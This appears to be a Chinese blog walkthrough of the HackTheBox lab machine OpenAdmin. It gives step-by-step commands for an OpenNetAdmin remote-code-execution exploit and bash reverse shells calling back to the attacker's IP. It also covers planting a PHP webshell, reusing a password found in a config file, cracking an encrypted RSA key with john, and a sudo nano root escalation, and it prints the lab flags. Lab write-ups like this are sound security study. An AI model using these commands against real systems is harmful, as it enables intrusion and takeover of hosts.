[Meachines] [Easy] OpenAdmin OpenNetAdmin-RCE+RSA私钥解密+Nano权限提升

于 2024-08-03 18:22:32 发布
阅读量272 收藏 2
点赞数 8
分类专栏: HackTheBox 文章标签: 网络
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140894687
版权

信息收集

IP AddressOpening Ports
10.10.10.171TCP:22,80

$ nmap -p- 10.10.10.171 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP

$ gobuster dir -u "http://10.10.10.171/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x html,txt,php -b 404,403 -t 50

image.png

username:admin password:admin

http://10.10.10.171/ona/

$ searchsploit OpenNetAdmin

image-1.png

$ cp /usr/share/exploitdb/exploits/php/webapps/47691.sh ./exp.sh

$ ./exp.sh 10.10.10.171/ona/

image-2.png

$ /bin/bash -c 'bash -i >%26 /dev/tcp/10.10.16.14/10032 0>%261'

image-3.png

www-data 横向 jimmy

$ cat /var/www/html/ona/local/config/database_settings.inc.php

image-4.png

username:ona_sys password:n1nj4W4rri0R!

$ su jimmy

image-5.png

jimmy 横向 joanna

方法1:HTTP

$ cat /etc/apache2/sites-enabled/internal.conf

image-6.png

$ ssh -i ~/.ssh/id_ed25519 jimmy@10.10.10.171 -L 52846:localhost:52846

http://127.0.0.1:52846/

image-7.png

$ vi /var/www/internal/reverse.php

<?php system("/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.14/10033 0>&1'");?>

$ curl http://127.0.0.1:52846/reverse.php

image-9.png

方法 2:RSA私钥解密SSH登录

$ cat main.php

$ curl 127.0.0.1:52846/main.php

image-10.png

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----

$ openssl rsa -in id_rsa

image-11.png

$ grep -i ninja /usr/share/wordlists/rockyou.txt > pass.txt

$ ssh2john id_rsa >./id_rsa.john

$ john --wordlist=./pass.txt id_rsa.john

password:bloodninjas

image-12.png

$ openssl rsa -in id_rsa -out id_rsa_dec

image-13.png

User.txt

f6a493f3f0bb5732733a0f6e0eae9cf9

权限提升

$ sudo -l

image-14.png

$ sudo /bin/nano /opt/priv

^R^X

reset; sh 1>&0 2>&0

image-15.png

Root.txt

709cb8750a646cbc3d99cedbc8d23de7

Мартин.
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2115
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
CVE-2019-11043:php-fpm + Nginx RCE
03-08
CVE-2019-11043 php-fpm + Nginx RCE0x01安装phuip-fpizdam-Mac go get github.com/neex/phuip-fpizdam go install github.com/neex/phuip-fpizdam ale@Pentest ~/go go get github....fpizdamale@Pentest ~/go lsbin ...
【thinkphp漏洞复现】2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞+in-sqlinjectionSQL注入漏洞
serendipity1130的博客
09-01 1519
参考文章:https://blog.csdn.net/weixin_43071873/article/details/110084577 一、2-RCE 漏洞详情: ThinkPHP是一个免费开源的一个PHP开发框架。ThinkPHP2.x版本中,使用preg_replace的/e模式匹配路由: 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时
CVE-2022-22963-Spring-Core-RCE图形化利用工具
LiBai'S BLOG
04-01 9768
CVE-2022-22963 描述:Spring4Shell - Spring Core RCE - CVE-2022-22965 链接:https://github.com/TheGejr/SpringShell 描述:Spring4Shell Proof Of Concept/Information CVE-2022-22965 链接:https://github.com/BobTheShoplifter/Spring4Shell-POC 描述:This includes CVE-2022-22
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 6448
一、漏洞介绍1.1漏洞成因 docker remote API未授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
Apache NiFi远程代码执行-RCE
Birdman-one的博客
12-11 1621
Apache NiFi远程代码执行-RCE 简介: Apache NiFi 是一个易于使用、功能强大而且可靠的数据处理和分发系统。Apache NiFi 是为数据流设计。它支持高度可配置的指示图的数据路由、转换和系统中介逻辑。 EXP:https://github.com/imjdl/Apache-NiFi-Api-RCE作者这里使用exp不行 使用方法:python exp.py [url] [反弹shell命令] MSF module: https://github.com/rapid7/metasp
【Vulfocus漏洞复现】spring-core-rce-2022-03-29
weixin_45632448的博客
04-15 5359
2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。 通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。 漏洞利用条件 1、A
fastjson(1.2.24-rce
不知名白帽的博客
06-19 1984
fastjson autotype在处理json对象的时候没有对@type字段进行安全性验证,导致攻击者传入危险类,并调用危险类连接远程主机,通过恶意类执行代码
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2442
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker未授权漏洞利用,ssh密钥连接
buuctf [ThinkPHP]5-Rce
qq_1873822的博客
03-14 1766
大佬们都是直接rce 这里漏洞技术细节(涉及代码段、原理等)我上个链接 https://blog.csdn.net/ArrowQin/article/details/105913146 https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg 解题 版本是ThinkPHP V5.0.20 poc ?s=index/\think\app/invokefunction&function=call_user_fun.
FastAdmin 用户权限RCE.md
04-26
FastAdmin 用户权限RCE
ProxyLogon:ProxyLogon(CVE-2021-26855 + CVE-2021-27065)Exchange Server RCE(SSRF-> GetWebShell)
03-25
ProxyLogon(CVE-2021-26855 + CVE-2021-27065)Exchange Server RCE(SSRF-> GetWebShell) usage : python ProxyLogon . py - - host = exchange . com - - mail = admin @ exchange . com python ProxyLogon ...
Apache-druid-kafka-rce.yaml
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
Struts2-RCE 一个Burp Extender,用于检查struts 2 RCE漏洞。描述此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是S2-001 S2-007 S2-008 S2-012 S2-...
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
互联网架构小马的博客
07-31 589
网络就像一把双刃剑,给我们的生活、交流、工作和发展带来了便利,但同时也给信息安全以及个人隐私带来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全和安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
未知攻焉知防:从攻击者视角看网络安全的“攻守之道”
科技云报道
08-01 339
基于独特的“动态安全+AI”技术思想,瑞数信息综合运用自动化攻击保护、0day防护、多源低频防护、多维度分层分级对抗等多种安全防护策略和手段,还推出瑞数WAAP超融合平台,支持WAF、Bots防护、0day攻击防护、应用DDoS防护、API安全防护等多项安全产品单独或联合部署,能够覆盖Web、移动App、H5、API及IoT全应用渠道,提供多层级的联动防御机制,令企业在各类复杂的环境中,都可以轻松实现应用安全一体化防御。其次,由于供应链数量众多,类型错综复杂,导致安全难以做到统一管理,供应链风险与日俱增。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
最新发布
Lusen的博客
08-02 501
Vulnhub系列Connect-The-Dots靶场做题记录
linux防火墙相关命令
九品神元师
08-01 204
【代码】linux防火墙相关命令。
poc-yaml-thinkphp5023-method-rce poc1
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行解析漏洞,攻击者可以利用该漏洞在服务器上执行任意命令。poc-yaml-thinkphp5023-method-rce 是一个利用该漏洞的示例程序。 通过 poc1 工具,攻击者可以利用 YAML 文件解析的漏洞,实现远程代码执行。攻击者通过构造恶意 YAML 文件,并将其作为参数发送给目标应用的接口,从而触发代码执行。 该漏洞的危害性很高,攻击者可以在受影响的应用上执行任意命令,例如查看、修改或删除敏感文件,创建新用户账户,获取数据库信息等。这可能导致严重的安全风险和数据泄露。 为了防止此漏洞的利用,建议使用 ThinkPHP 的最新版本,并及时更新框架。此外,应开启严格的访问控制,限制对敏感函数和文件的访问。同时,将任何用户输入数据进行严格过滤和验证,以防止注入攻击。最重要的是,及时关注和安装安全补丁,保持应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值